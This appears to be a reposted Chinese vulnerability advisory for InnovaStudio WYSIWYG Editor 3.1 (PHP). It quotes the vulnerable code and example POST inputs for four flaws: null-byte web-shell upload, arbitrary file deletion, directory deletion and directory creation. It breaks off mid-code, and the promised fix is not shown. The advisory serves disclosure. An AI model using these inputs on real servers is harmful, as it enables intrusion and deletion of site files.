editor.ctrl.php+漏洞,InnovaStudio WYSIWYG Editor 3.1 [php版]任意上传文件漏洞及修复漏洞预警 -电脑资料...

孟凯泽
2023-12-01

漏洞一 任意上传文件[magic_quotes_gpc=Off]

漏洞文件:assetmanager.php

POST inpCurrFolder2=/var/www/shell.php%00

漏洞代码:第42行

if(isset($_FILES["File1"]))

{

if(isset($_POST["inpCurrFolder2"]))$currFolder=$_POST['inpCurrFolder2']; //目录可以构造magic_quotes_gpc=off时可写任意文件

if(isset($_REQUEST["inpFilter"]))$ffilter=$_REQUEST["inpFilter"];

if($MaxFileSize && ($_FILES['File1']['size'] > $MaxFileSize))

{

$sMsg = "The file exceeds the maximum size allowed.";

}

else if(!isTypeAllowed($_FILES['File1']['name']))

{

$sMsg = "The File Type is not allowed.";

}

else if (move_uploaded_file($_FILES['File1']['tmp_name'], $currFolder."/".basename($_FILES['File1']['name'])))

{

$sMsg = "";

$sUploadedFile=$_FILES['File1']['name'];

@chmod($currFolder."/".basename($_FILES['File1']['name']), 0644);

}

else

{

$sMsg = "Upload failed.";

}

}

-------------------

2.访问权限未设置导致任意删除文件

漏洞文件:assetmanager.php

[POST] inpFileToDelete=/var/www/index.php

漏洞代码:第72行

if(isset($_POST["inpFileToDelete"]))

{

$filename=pathinfo($_POST["inpFileToDelete"]);

$filename=$filename['basename'];

if($filename!="")

unlink($currFolder . "/" . $filename);

$sMsg = "";

}

-------------------

3.访问权限未设置导致任意目录删漏洞

漏洞文件:folderdel_.php

[POST]inpCurrFolder=/var/www/upload/

漏洞代码 第3行

if(isset($_POST["inpCurrFolder"]))

{

$sDestination = pathinfo($_POST["inpCurrFolder"]);

//DELETE ALL FILES IF FOLDER NOT EMPTY

$dir = $_POST["inpCurrFolder"];

$handle = opendir($dir);

while($file = readdir($handle)) if($file != "." && $file != "..") unlink($dir . "/" . $file);

closedir($handle);

if(rmdir($_POST["inpCurrFolder"])==0)

$sMsg = "";

else

$sMsg = "";

}

-------------------

4.访问权限未设置导致任意目录创建

漏洞文件:foldernew.php

[POST] inpCurrFolder=/var/www/&inpNewFolderName=123

漏洞代码:第3行

if(isset($_POST["inpNewFolderName"]))

{

$sFolder = $_POST["inpCurrFolder"]."/".$_POST["inpNewFolderName"];

if(is_dir($sFolder)==1)

{//folder already exist

$sMsg = "";

}

else

{

//if(mkdir($sFolder))

if(mkdir($sFolder,0755))

 类似资料: